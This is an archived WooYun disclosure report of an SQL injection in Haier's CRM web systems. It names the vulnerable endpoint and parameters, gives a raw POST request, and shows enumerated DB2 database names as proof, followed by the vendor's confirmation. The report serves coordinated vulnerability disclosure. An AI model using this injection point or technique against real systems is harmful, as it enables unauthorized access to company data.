当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034080

漏洞标题:海尔集团之13某系统SQL注射之初遇IBM-DB

相关厂商:海尔集团

漏洞作者: 小胖子

提交时间:2013-08-11 10:27

修复时间:2013-09-25 10:27

公开时间:2013-09-25 10:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-11: 细节已通知厂商并且等待厂商处理中
2013-08-14: 厂商已经确认,细节仅向厂商公开
2013-08-24: 细节向核心白帽子及相关领域专家公开
2013-09-03: 细节向普通白帽子公开
2013-09-13: 细节向实习白帽子公开
2013-09-25: 细节向公众公开

简要描述:

小胖子正在暴走!!
小胖子已经超越神的杀戮!!求求谁去杀了他吧!!

详细说明:

这个注射涉及这些系统:
http://www.haiercrm.com/jxc/index.jsp 直销员短信条码提报平台
http://www.haiercrm.com/acceptcatdata/login.jsp 短信息上报平台
http://www.haiercrm.com/ipos/login/login.htm 客户关系管理系统
http://www.haiercrm.com/rrs/login.jsp 网络管理平台
发现一个注入点:http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?PageIndex=1&search1=&search2=&search3=12C01&name1=SAP_FROMMFID&name2=SAP_FROMMFNAME&mktid=
get注射 参数:search1 search2 典型的搜索型注入。
也可以post

POST http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?mktid= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?name1=SAP_FROMMFID&name2=SAP_FROMMFNAME&search3=12C01
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.haiercrm.com
Content-Length: 93
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=9D4BC4EA3783F83016358A59ADE7EDD9
name1=SAP_FROMMFID&name2=SAP_FROMMFNAME&search1=1&search2=2&search3=12C01&Submit=%B2%E9%D5%D2


.png


这里没有过滤
原来是IBM的DB2

IBM.png


得到数据还是不少呀

漏洞证明:

available databases [24]:
[*] ovmmje
[*] qcdbupxo
[*] rvftu
[*] test
[*] uftu
[*] xtvtfs
[*] "mtd"
[*] "tttdbu"
[*] "tttgvo"
[*] "tttjcn"
[*] "ttttubu"
[*] dbusrhq
[*] dsn
[*] dsnjqpt
[*] ecabenjo
[*] ecajotua
[*] ecvtsir
[*] joufsgbd
[*] nluaaaaa
[*] nluaabaa
[*] nluaacaa
[*] nluaadaa
[*] nluaaeaa
[*] nluaafaa

修复方案:

0x1:过滤。
0x2:这个访问链接也是未授权访问的。

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-08-14 11:17

厂商回复:

感谢 @小胖子 的工作。
业务单位答复:首先感谢您对我们系统进行的漏洞风险提示,针对提示我们进行了排查,发现是因早期程序造成的泄露漏洞,我们会尽快将原有系统的程序都检查一遍,将其中的漏洞进行封堵,具体控制手段包括目录访问限制、目录列表访问限制、页面SESSION限制等,我们会在两周内将系统内类似风险进行控制,请继续协助监督,感谢!由于本系统使用率低,使用人员少,并考虑合并迁移,因此危害等级为低。
请各位白帽子持续友好监督海尔信息安全工作,非常感谢。

最新状态:

暂无